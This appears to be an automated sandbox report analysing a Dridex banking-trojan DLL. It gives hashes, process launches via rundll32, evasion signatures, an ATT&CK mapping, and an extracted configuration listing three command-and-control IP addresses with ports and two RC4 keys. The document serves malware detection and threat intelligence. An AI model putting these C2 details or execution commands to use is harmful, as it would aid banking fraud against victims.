Play interactive tour

Edit tour

Analysis Report u3A1eWFqLE

Overview

General Information

Sample Name:	u3A1eWFqLE (renamed file extension from none to dll)
Analysis ID:	392886
MD5:	13272e189ce1c61b9a7c3660ea94ab2a
SHA1:	3593c7bb4229f1e822839c11ab3713c970b584e4
SHA256:	2e3dc149c4384b79a6f19305efa6762602100b568c4a73b88ce3b714644ed849
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5928 cmdline: loaddll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 4652 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5612 cmdline: rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1112 cmdline: rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 420 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.496447134.0000000070561000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.rundll32.exe.70560000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.70560000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.70560000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: u3A1eWFqLE.dll

Joe Sandbox ML: detected

Source: 3.2.rundll32.exe.3150000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 1.2.loaddll32.exe.9e0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 6.2.rundll32.exe.8e0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: u3A1eWFqLE.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: u3A1eWFqLE.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.313479938.0000000000722000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000003.00000003.305021472.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.373441073.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000003.00000003.305021472.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.373441073.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.312837637.000000000071C000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000009.00000002.339151695.00000000000D2000.00000004.00000010.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp, u3A1eWFqLE.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.323240047.00000000049E0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.314590661.0000000000728000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.314590661.0000000000728000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.323240047.00000000049E0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.313479938.0000000000722000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.323240047.00000000049E0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.312837637.000000000071C000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97
Source: Joe Sandbox View	IP Address: 94.247.168.64 94.247.168.64

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: u3A1eWFqLE.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

Source: loaddll32.exe

Binary or memory string: yWindow"/> <HOOK MODULE="USER32.DLL" FUNCTION="RedrawWindow"/> <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreate"/> <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> <HOOK MODULE="D3D8.DLL" FUNCTION="Direct3DCreate8"/>

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000006.00000002.496447134.0000000070561000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.rundll32.exe.70560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.70560000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_7057218C NtDelayExecution,	3_2_7057218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_70572790 NtAllocateVirtualMemory,	3_2_70572790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_7056BC00 NtClose,	3_2_7056BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_70561494	3_2_70561494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_705707CC	3_2_705707CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_705714D8	3_2_705714D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_705684E4	3_2_705684E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_70569144	3_2_70569144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_7056A5A4	3_2_7056A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_705792DC	3_2_705792DC

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 420

Source: u3A1eWFqLE.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs u3A1eWFqLE.dll

Source: u3A1eWFqLE.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: u3A1eWFqLE.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5928

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD81F.tmp

Jump to behavior

Source: u3A1eWFqLE.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 420
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1	Jump to behavior

Source: u3A1eWFqLE.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: u3A1eWFqLE.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.313479938.0000000000722000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000003.00000003.305021472.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.373441073.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000003.00000003.305021472.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.373441073.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.312837637.000000000071C000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000009.00000002.339151695.00000000000D2000.00000004.00000010.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp, u3A1eWFqLE.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.323240047.00000000049E0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.323217515.00000000049E8000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.323211797.00000000049E2000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.314590661.0000000000728000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.314590661.0000000000728000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.323240047.00000000049E0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.313479938.0000000000722000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.323207082.0000000004841000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.323240047.00000000049E0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.312837637.000000000071C000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00A6A448 push ds; retf		1_2_00A6A53A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_7056F744 push esi; mov dword ptr [esp], 00000000h		3_2_7056F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 881

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 539

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_705707CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

3_2_705707CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 00000009.00000002.340008293.0000000004640000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000009.00000002.340008293.0000000004640000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000009.00000002.340008293.0000000004640000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000009.00000002.340008293.0000000004640000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_70566DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_70566DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_70573060 RtlAddVectoredExceptionHandler,

3_2_70573060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1

Jump to behavior

Source: rundll32.exe, 00000003.00000002.492389578.0000000003760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.496176679.0000000003430000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.492389578.0000000003760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.496176679.0000000003430000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.492389578.0000000003760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.496176679.0000000003430000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000003.00000002.492389578.0000000003760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.496176679.0000000003430000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000003.00000002.492389578.0000000003760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.496176679.0000000003430000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_70566DC8

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_70566DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	Input Capture1	Security Software Discovery111	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
u3A1eWFqLE.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.3150000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
1.2.loaddll32.exe.9e0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
6.2.rundll32.exe.8e0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	u3A1eWFqLE.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392886
Start date:	19.04.2021
Start time:	23:43:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	u3A1eWFqLE (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
